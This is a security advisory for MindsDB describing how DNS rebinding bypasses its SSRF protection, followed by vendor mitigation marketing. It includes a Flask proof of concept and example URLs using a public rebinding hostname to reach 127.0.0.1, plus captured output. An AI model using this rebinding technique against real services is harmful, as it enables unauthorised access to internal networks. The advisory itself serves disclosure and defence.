GHSA-4jcv-vp96-94xr
CRITICALMindsDB Vulnerable to Bypass of SSRF Protection with DNS Rebinding
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
mindsdbReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.
Description
Summary
DNS rebinding is a method of manipulating resolution of domain names to let the initial DNS query hits an address and the second hits another one. For instance the host make-190.119.176.200-rebind-127.0.0.1-rr.1u.ms would be initially resolved to 190.119.176.200 and the next DNS issue to 127.0.0.1. Please notice the following in the latest codebase:
def is_private_url(url: str):
"""
Raises exception if url is private
:param url: url to check
"""
hostname = urlparse(url).hostname
if not hostname:
# Unable to find hostname in url
return True
ip = socket.gethostbyname(hostname)
return ipaddress.ip_address(ip).is_private
As you can see, during the call to is_private_url() the initial DNS query would be issued by ip = socket.gethostbyname(hostname) to an IP (public one) and then due to DNS Rebinding, the next GET request would goes to the private one.
PoC
from flask import Flask, request, jsonify
from urllib.parse import urlparse
import socket
import ipaddress
import requests
app = Flask(__name__)
def is_private_url(url: str):
"""
Raises exception if url is private
:param url: url to check
"""
hostname = urlparse(url).hostname
if not hostname:
# Unable to find hostname in url
return True
ip = socket.gethostbyname(hostname)
if ipaddress.ip_address(ip).is_private:
raise Exception(f"Private IP address found for {url}")
@app.route("/", methods=["GET"])
def index():
return "http://127.0.0.1:5000/check_private_url?url=https://www.google.Fr"
@app.route("/check_private_url", methods=["GET"])
def check_private_url():
url = request.args.get("url")
if not url:
return jsonify({"error": 'Missing "url" parameter'}), 400
try:
is_private_url(url)
response = requests.get(url)
return jsonify(
{
"url": url,
"is_private": False,
"text": response.text,
"status_code": response.status_code,
}
)
except Exception as e:
return jsonify({"url": url, "is_private": True, "error": str(e)})
if __name__ == "__main__":
app.run(debug=True)
After running the poc.py with flask installed, consider visiting the following URLs:
- http://127.0.0.1:5000/check_private_url?url=https://www.example.com since it is in the public space, you would get
is_private: falseand the GET request would be issued to the www.Example.com website. - http://127.0.0.1:5000/check_private_url?url=http://localhost:8667, this one the address is private, you would get
is_private: true - http://127.0.0.1:5000/check_private_url?url=http://make-190.119.176.214-rebind-127.0.0.1-rr.1u.ms:8667/ But this one, it initially returns the public IP
190.119.176.214and then DNS rebind into the network location127.0.0.1:8667.
I set up a simple HTTP server at 127.0.0.1:8667, you can notice the results of the PoC in the next screenshot:
{
"is_private": false,
"status_code": 200,
"text": "<pre>\n<a href=\"poc.py\">poc.py</a>\n</pre>\n",
"url": "http://make-190.119.176.214-rebind-127.0.0.1-rr.1u.ms:8667/"
}
Impact
- Bypass the SSRF protection on the whole website with DNS Rebinding.
- DoS too.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐍PyPI | mindsdb | all versions | 23.12.4.2 |
Research use only. For defensive security, authorized penetration testing, and academic research only. Never execute exploit code against systems without explicit written authorization.
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for mindsdb. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update mindsdb to 23.12.4.2 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-4jcv-vp96-94xr is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-4jcv-vp96-94xr is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-4jcv-vp96-94xr. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-4jcv-vp96-94xr in your dependencies?
O3 detects GHSA-4jcv-vp96-94xr across PyPI dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.